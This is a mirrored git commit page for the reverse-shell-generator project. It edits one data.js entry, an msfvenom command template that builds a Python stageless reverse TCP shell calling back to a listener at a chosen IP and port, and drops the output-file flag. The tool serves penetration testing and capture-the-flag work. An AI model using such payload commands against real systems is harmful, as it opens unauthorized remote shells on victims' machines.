mirror of
https://github.com/0dayCTF/reverse-shell-generator.git
synced 2025-01-19 01:08:50 +00:00
Update data.js
Fix the Python Stageless Reverse TCP output file extension error https://github.com/0dayCTF/reverse-shell-generator/issues/96
This commit is contained in:
parent
63978e4b9e
commit
7b86264ecd
@ -440,7 +440,7 @@ const msfvenomCommands = withCommandType(
|
|||||||
},
|
},
|
||||||
{
|
{
|
||||||
"name": "Python Stageless Reverse TCP",
|
"name": "Python Stageless Reverse TCP",
|
||||||
"command": "msfvenom -p cmd/unix/reverse_python LHOST={ip} LPORT={port} -f raw -o shell.py",
|
"command": "msfvenom -p cmd/unix/reverse_python LHOST={ip} LPORT={port} -f raw",
|
||||||
"meta": ["msfvenom", "windows", "linux", "stageless", "reverse"]
|
"meta": ["msfvenom", "windows", "linux", "stageless", "reverse"]
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
|
Loading…
Reference in New Issue
Block a user